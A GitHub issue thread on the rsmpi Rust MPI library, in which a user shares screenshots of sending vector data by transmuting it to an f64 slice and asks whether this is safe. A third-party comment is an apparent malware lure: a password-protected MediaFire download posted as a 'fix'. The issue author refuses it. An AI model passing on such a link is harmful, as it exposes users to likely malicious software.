### ISSUE TITLE
Add example to send/recv complex datatypes with std::mem::transmute

### ISSUE THREAD

**Issue by oxcrow** [rsmpi/rsmpi#196]
Hello,

I had a lot of difficulty to send/recv complex datatypes using rsmpi.

I found that casting down to a 1D array slice using `std::mem::transmute` allowed me to send the data without implementing the non-trivial `Equivalence`, `Buffer` and `BufferMut` traits.

I'm sharing my results, in hope to know if this is safe/correct to use, and if some examples could be created to show everyone how to do this kind of operations. My code is just a screenshot and will not compile for others, but it isn't meant to. I'm just sharing my preliminary results. If required I will create a simpler POC later on.

I wanted to send/recv  a `Vec<Vec3>` i.e a Vector of 3D Vectors (eg. surface normals, cell centroids, etc.)

Since my `Vec3` does not have the required traits to be sent over rsmpi, I was stuck.

Then I decided to cast it down to an array slice, and send it instead. And surprisingly ... it worked.

Here,

- We fill an array `dn` with `[1.0, 2.0, 3.0]` on root rank, and `[0.0, 0.0, 0.0]` on every other rank. Then send the data from root to all other ranks.
- Finally we print the results after receiving the data, and as seen, all ranks received the data `[1.0, 2.0, 3.0]`.

![code](https://github.com/user-attachments/assets/c5ae9b8b-1f08-4c91-8f91-9eb10b425a9d)
![result](https://github.com/user-attachments/assets/de119c64-7a2c-4363-9f91-c3de48604d3d)

Since this seemed to work for me, I was wondering if a similar/simpler example could be added to the repo.

I was able to `transmute` to a `&[f64]` but for more generic cases, other users might also want to `transmute` to `&[u8]`, since it represents the byte array directly ... and may work better.

Thanks!

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by oxcrow** [comment]
@goncastrum Apologies, but I'm **not** clicking on your link, nor installing _anything_ that you shared.

**Comment by oxcrow** [comment]
I realize, the previous code I shared might be little bit ugly to read/understand.

Here's a "prettier" version of the same code, which I refactored, to be more easy to read/understand.

This seems to work perfectly, and similar examples could be added to help other users who find it difficult to send complex types using rsmpi.

Thanks!

![result2](https://github.com/user-attachments/assets/18acdd9b-91f7-46f3-907e-5b752a450fd1)
